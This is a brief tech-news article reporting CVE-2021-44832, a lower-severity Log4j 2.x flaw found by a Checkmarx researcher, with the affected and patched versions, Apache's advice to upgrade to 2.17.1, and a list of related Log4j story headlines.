The fifth vulnerability has appeared on the Log4j, the tool that caused headaches for enterprises and IT teams. While the threat actors are constantly looking for unpatched and vulnerable systems to abuse, Apache urges users to follow the update schedules and apply them immediately.
It affects almost all of Log4j 2.xx versions
The new flaw, tracked as CVE-2021-44832 affects almost all of the Log4j 2.xx versions, including 2.17.0. The only unaffected versions are 2.3.2 and 2.12.4. The Log4j 1.xx versions also remain unaffected. Still, Apache advises users to update their Log4j to 2.3.2 for Java 6, 2.12.4 for Java 7, and 2.17.1 for Java 8 and later.
The new bug has been found by a security researcher from Checkmarx, named Yaniv Nizry. According to Nizry, the now-fixed flaw opens the doors for arbitrary code execution but not for remote code execution. He also adds that the flaw’s severity is lower than the original Log4Shell and requires modifying the configuration.
Apache has recognized Yaniv Nizry’s warning and developed/released a new patch, Log4j 2.17.1 in just a single day, which makes it quite impressive. The new version fixes the vulnerability reported by Nizry.
You can read the full technical details of the new flaw here.
Related Stories
- Lacework introduces Lacework Cloud Care to fight against Log4j
- Datto released Log4j tool for MSPs
- VMware vCenter Server is targetted by hackers via Log4j flaws
- Two new vulnerabilities are found on Log4j, only one of them is fixed yet
- CISA published an emergency directive for Log4j
- Google joining the war against Log4j exploits
- Hackers exploit Log4j to inject Monero miners, shifting from LDAP to RMI
- A third, new Apache Log4j vulnerability is discovered
- How to scan your server to detect Log4j (Log4Shell) vulnerability
- The Log4j flaw is patched but it is still vulnerable
- CISA published Log4j vulnerability guidance
- Zero-day Apache Log4j RCE vulnerability (Log4Shell) is being exploited